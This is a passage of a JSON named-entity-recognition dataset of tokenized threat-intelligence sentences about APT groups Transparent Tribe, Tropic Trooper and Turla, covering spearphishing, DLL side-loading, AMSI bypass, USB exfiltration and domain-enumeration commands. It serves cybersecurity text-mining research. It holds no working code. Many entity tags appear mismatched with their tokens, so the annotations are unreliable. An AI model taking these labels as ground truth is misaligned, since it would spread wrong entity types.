"malicious", - "files", - "to", - "exploit", - "CVE-2012-0158", - "and", - "CVE-2010-3333", - "for", - "execution." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "B-Features", - "O", - "O" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "can", - "hide", - "legitimate", - "directories", - "and", - "replace", - "them", - "with", - "malicious", - "copies", - "of", - "the", - "same", - "name." - ], - "ner_tags": [ - "O", - "O", - "O", - "B-Purp", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "has", - "used", - "weaponized", - "documents", - "in", - "e-mail", - "to", - "compromise", - "targeted", - "systems." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "has", - "directed", - "users", - "to", - "open", - "URLs", - "hosting", - "malicious", - "content." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "can", - "mimic", - "legitimate", - "Windows", - "directories", - "by", - "using", - "the", - "same", - "icons", - "and", - "names." - ], - "ner_tags": [ - "B-SamFile", - "O", - "O", - "I-Features", - "I-Features", - "I-Features", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "has", - "sent", - "spearphishing", - "e-mails", - "with", - "attachments", - "to", - "deliver", - "malicious", - "payloads." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "has", - "embedded", - "links", - "to", - "malicious", - "downloads", - "in", - "e-mails." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Transparent", - "Tribe", - "has", - "crafted", - "VBS-based", - "malicious", - "documents." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "used", - "SSL", - "to", - "connect", - "to", - "C2", - "servers." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "collected", - "information", - "automatically", - "using", - "the", - "adversary's", - "USBferry", - "attack." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Org", - "B-OffAct" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "used", - "a", - "copy", - "function", - "to", - "automatically", - "exfiltrate", - "sensitive", - "data", - "from", - "air-gapped", - "systems", - "using", - "USB", - "storage." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "been", - "known", - "to", - "side-load", - "DLLs", - "using", - "a", - "valid", - "version", - "of", - "a", - "Windows", - "Address", - "Book", - "and", - "Windows", - "Defender", - "executable", - "with", - "one", - "of", - "their", - "tools." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper's", - "backdoor", - "has", - "communicated", - "to", - "the", - "C2", - "over", - "the", - "DNS", - "protocol." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "used", - "shellcode", - "with", - "an", - "XOR", - "algorithm", - "to", - "decrypt", - "a", - "payload.", - "Tropic", - "Trooper", - "also", - "decrypted", - "image", - "files", - "which", - "contained", - "a", - "payload." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "injected", - "a", - "DLL", - "backdoor", - "into", - "dllhost.exe", - "and", - "svchost.exe." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "encrypted", - "traffic", - "with", - "the", - "C2", - "to", - "prevent", - "network", - "detection." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "encrypted", - "configuration", - "files." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "exfiltrated", - "data", - "using", - "USB", - "storage", - "devices." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "executed", - "commands", - "through", - "Microsoft", - "security", - "vulnerabilities,", - "including", - "CVE-2017-11882,", - "CVE-2018-0802,", - "and", - "CVE-2012-0158." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Features", - "B-Features", - "O", - "B-Features" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "deleted", - "dropper", - "files", - "on", - "an", - "infected", - "system", - "using", - "command", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "monitored", - "files'", - "modified", - "time." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "created", - "a", - "hidden", - "directory", - "under", - "<code>C:\\ProgramData\\Apple\\Updates\\</code>", - "and", - "<code>C:\\Users\\Public\\Documents\\Flash\\</code>." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "used", - "a", - "delivered", - "trojan", - "to", - "download", - "additional", - "files." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "used", - "known", - "administrator", - "account", - "credentials", - "to", - "execute", - "the", - "backdoor", - "directly." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "lured", - "victims", - "into", - "executing", - "malware", - "via", - "malicious", - "e-mail", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "hidden", - "payloads", - "in", - "Flash", - "directories", - "and", - "fake", - "installer", - "files." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "used", - "multiple", - "Windows", - "APIs", - "including", - "HttpInitialize,", - "HttpCreateHttpHandle,", - "and", - "HttpAddUrl." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "used", - "<code>pr</code>", - "and", - "an", - "openly", - "available", - "tool", - "to", - "scan", - "for", - "open", - "ports", - "on", - "target", - "systems." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "used", - "<code>netview</code>", - "to", - "scan", - "target", - "systems", - "for", - "shared", - "resources." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "is", - "capable", - "of", - "enumerating", - "the", - "running", - "processes", - "on", - "the", - "system", - "using", - "<code>pslist</code>." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "created", - "shortcuts", - "in", - "the", - "Startup", - "folder", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "attempted", - "to", - "transfer", - "USBferry", - "from", - "an", - "infected", - "USB", - "device", - "by", - "copying", - "an", - "Autorun", - "function", - "to", - "the", - "target", - "machine." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "I-Purp", - "I-Purp", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "can", - "search", - "for", - "anti-virus", - "software", - "running", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper's", - "backdoor", - "could", - "list", - "the", - "infected", - "system's", - "installed", - "software." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "B-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "sent", - "spearphishing", - "emails", - "that", - "contained", - "malicious", - "Microsoft", - "Office", - "and", - "fake", - "installer", - "file", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "I-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "used", - "base64", - "encoding", - "to", - "hide", - "command", - "strings", - "delivered", - "from", - "the", - "C2." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "used", - "JPG", - "files", - "with", - "encrypted", - "payloads", - "to", - "mask", - "their", - "backdoor", - "routines", - "and", - "evade", - "detection." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "detected", - "a", - "target", - "system’s", - "OS", - "version", - "and", - "system", - "volume", - "information." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "used", - "scripts", - "to", - "collect", - "the", - "host's", - "network", - "topology." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "tested", - "if", - "the", - "localhost", - "network", - "is", - "available", - "and", - "other", - "connection", - "capability", - "on", - "an", - "infected", - "system", - "using", - "command", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Tool", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "used", - "<code>letmein</code>", - "to", - "scan", - "for", - "saved", - "usernames", - "on", - "the", - "target", - "system." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "delivered", - "malicious", - "documents", - "with", - "the", - "XLSX", - "extension,", - "typically", - "used", - "by", - "OpenXML", - "documents,", - "but", - "the", - "file", - "itself", - "was", - "actually", - "an", - "OLE", - "(XLS)", - "document." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "used", - "HTTP", - "in", - "communication", - "with", - "the", - "C2." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "started", - "a", - "web", - "service", - "in", - "the", - "target", - "host", - "and", - "wait", - "for", - "the", - "adversary", - "to", - "connect,", - "acting", - "as", - "a", - "web", - "shell." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "used", - "Windows", - "command", - "scripts." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "installed", - "a", - "service", - "pointing", - "to", - "a", - "malicious", - "DLL", - "dropped", - "to", - "disk." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Tropic", - "Trooper", - "has", - "created", - "the", - "Registry", - "key", - "<code>HKCU\\Software\\Microsoft\\Windows", - "NT\\CurrentVersion\\Winlogon\\Shell</code>", - "and", - "sets", - "the", - "value", - "to", - "establish", - "persistence." - ], - "ner_tags": [ - "B-Idus", - "B-HackOrg", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "encrypted", - "files", - "stolen", - "from", - "connected", - "USB", - "drives", - "into", - "a", - "RAR", - "file", - "before", - "exfiltration." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Tool", - "I-Way", - "O", - "O" - ] - }, - { - "tokens": [ - "A", - "Turla", - "JavaScript", - "backdoor", - "has", - "used", - "Google", - "Apps", - "Script", - "as", - "its", - "C2", - "server." - ], - "ner_tags": [ - "O", - "B-Idus", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "may", - "attempt", - "to", - "connect", - "to", - "systems", - "within", - "a", - "victim's", - "network", - "using", - "<code>net", - "use</code>", - "commands", - "and", - "a", - "predefined", - "list", - "or", - "collection", - "of", - "passwords." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "modified", - "variables", - "in", - "kernel", - "memory", - "to", - "turn", - "off", - "Driver", - "Signature", - "Enforcement", - "after", - "exploiting", - "vulnerabilities", - "that", - "obtained", - "kernel", - "mode", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "encryption", - "(including", - "salted", - "3DES", - "via", - "PowerSploit's", - "<code>Out-EncryptedScript.ps1</code>),", - "random", - "variable", - "names,", - "and", - "base64", - "encoding", - "to", - "obfuscate", - "PowerShell", - "commands", - "and", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "RPC", - "backdoors", - "can", - "impersonate", - "or", - "steal", - "process", - "tokens", - "before", - "executing", - "commands." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "B-SecTeam", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "a", - "custom", - ".NET", - "tool", - "to", - "collect", - "documents", - "from", - "an", - "organization's", - "internal", - "central", - "database." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Tool", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "RPC", - "backdoors", - "can", - "upload", - "files", - "from", - "victim", - "machines." - ], - "ner_tags": [ - "B-Idus", - "B-Tool", - "B-SecTeam", - "O", - "B-Features", - "I-Features", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "RPC", - "backdoors", - "can", - "collect", - "files", - "from", - "USB", - "thumb", - "drives." - ], - "ner_tags": [ - "B-Idus", - "B-SamFile", - "B-SecTeam", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "a", - "custom", - "decryption", - "routine,", - "which", - "pulls", - "key", - "and", - "salt", - "values", - "from", - "other", - "artifacts", - "such", - "as", - "a", - "WMI", - "filter", - "or", - "PowerShell", - "Profile,", - "to", - "decode", - "encrypted", - "PowerShell", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "I-Tool", - "I-Tool", - "O", - "O", - "O", - "O", - "B-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "B-Way", - "B-Tool", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "a", - "AMSI", - "bypass,", - "which", - "patches", - "the", - "in-memory", - "amsi.dll,", - "in", - "PowerShell", - "scripts", - "to", - "bypass", - "Windows", - "antimalware", - "products." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "<code>net", - "user", - "/domain</code>", - "to", - "enumerate", - "domain", - "accounts." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "<code>net", - "group", - "\"Domain", - "Admins\"", - "/domain</code>", - "to", - "identify", - "domain", - "administrators." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "infected", - "victims", - "using", - "watering", - "holes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "B-Way", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "Metasploit", - "to", - "perform", - "reflective", - "DLL", - "injection", - "in", - "order", - "to", - "escalate", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "WebDAV", - "to", - "upload", - "stolen", - "USB", - "files", - "to", - "a", - "cloud", - "drive.", - "Turla", - "has", - "also", - "exfiltrated", - "stolen", - "files", - "to", - "OneDrive", - "and", - "4shared." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Turla", - "has", - "exploited", - "vulnerabilities", - "in", - "the", - "VBoxDrv.sys", - "driver", - "to", - "obtain", - "kernel", - "mode", - "privileges." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "surveys", - "a", - "system", - "upon", - "check-in", - "to", - "discover", - "files", - "in", - "specific", - "locations", - "on", - "the", - "hard", - "disk", - "%TEMP%", - "directory,", - "the", - "current", - "user's", - "desktop,", - "the", - "Program", - "Files", - "directory,", - "and", - "Recent.", - "Turla", - "RPC", - "backdoors", - "have", - "also", - "searched", - "for", - "files", - "matching", - "the", - "<code>lPH*.dll</code>", - "pattern." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-SamFile", - "B-SamFile", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "the", - "Registry", - "to", - "store", - "encrypted", - "and", - "encoded", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "surveys", - "a", - "system", - "upon", - "check-in", - "to", - "discover", - "Group", - "Policy", - "details", - "using", - "the", - "<code>gpresult</code>", - "command." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Based", - "on", - "comparison", - "of", - "Gazer", - "versions,", - "Turla", - "made", - "an", - "effort", - "to", - "obfuscate", - "strings", - "in", - "the", - "malware", - "that", - "could", - "be", - "used", - "as", - "IoCs,", - "including", - "the", - "mutex", - "name", - "and", - "named", - "pipe." - ], - "ner_tags": [ - "O", - "O", - "O", - "O", - "B-Way", - "O", - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "shellcode", - "to", - "download", - "Meterpreter", - "after", - "compromising", - "a", - "victim." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "compromised", - "internal", - "network", - "systems", - "to", - "act", - "as", - "a", - "proxy", - "to", - "forward", - "traffic", - "to", - "C2." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "<code>tracert</code>", - "to", - "check", - "internet", - "connectivity." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "various", - "JavaScript-based", - "backdoors." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool" - ] - }, - { - "tokens": [ - "Turla", - "RPC", - "backdoors", - "can", - "be", - "used", - "to", - "transfer", - "files", - "to/from", - "victim", - "machines", - "on", - "the", - "local", - "network." - ], - "ner_tags": [ - "B-SamFile", - "B-SecTeam", - "B-SecTeam", - "O", - "O", - "O", - "O", - "I-Features", - "I-Features", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "<code>net", - "user</code>", - "to", - "enumerate", - "local", - "accounts", - "on", - "the", - "system." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "O", - "O", - "O", - "B-Purp", - "O", - "B-Purp", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "abused", - "local", - "accounts", - "that", - "have", - "the", - "same", - "password", - "across", - "the", - "victim’s", - "network." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-OffAct", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "<code>net", - "localgroup</code>", - "and", - "<code>net", - "localgroup", - "Administrators</code>", - "to", - "enumerate", - "group", - "information,", - "including", - "members", - "of", - "the", - "local", - "administrators", - "group." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "multiple", - "backdoors", - "which", - "communicate", - "with", - "a", - "C2", - "server", - "via", - "email", - "attachments." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-Way", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "spearphishing", - "via", - "a", - "link", - "to", - "get", - "users", - "to", - "download", - "and", - "run", - "their", - "malware." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "developed", - "its", - "own", - "unique", - "malware", - "for", - "use", - "in", - "operations." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "malware", - "obtained", - "after", - "compromising", - "other", - "threat", - "actors,", - "such", - "as", - "OilRig." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "I-HackOrg", - "O", - "O", - "O", - "B-Way" - ] - }, - { - "tokens": [ - "Turla", - "has", - "modify", - "Registry", - "values", - "to", - "store", - "payloads." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "and", - "its", - "RPC", - "backdoors", - "have", - "used", - "APIs", - "calls", - "for", - "various", - "tasks", - "related", - "to", - "subverting", - "AMSI", - "and", - "accessing", - "then", - "executing", - "commands", - "through", - "RPC", - "and/or", - "named", - "pipes." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "B-Tool", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Way", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "<code>net", - "accounts</code>", - "and", - "<code>net", - "accounts", - "/domain</code>", - "to", - "acquire", - "password", - "policy", - "information." - ], - "ner_tags": [ - "B-Idus", - "O", - "B-Way", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Purp", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "<code>fsutil", - "fsinfo", - "drives</code>", - "to", - "list", - "connected", - "drives." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O" - ] - }, - { - "tokens": [ - "Turla", - "has", - "used", - "PowerShell", - "to", - "execute", - "commands/scripts,", - "in", - "some", - "cases", - "via", - "a", - "custom", - "executable", - "or", - "code", - "from", - "Empire's", - "PSInject.", - "Turla", - "has", - "also", - "used", - "PowerShell", - "scripts", - "to", - "load", - "and", - "execute", - "malware", - "in", - "memory." - ], - "ner_tags": [ - "B-Idus", - "O", - "O", - "B-Way", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "O", - "B-Idus", - "O", - "O", - "O", - "B-Way", - "B-Tool", - 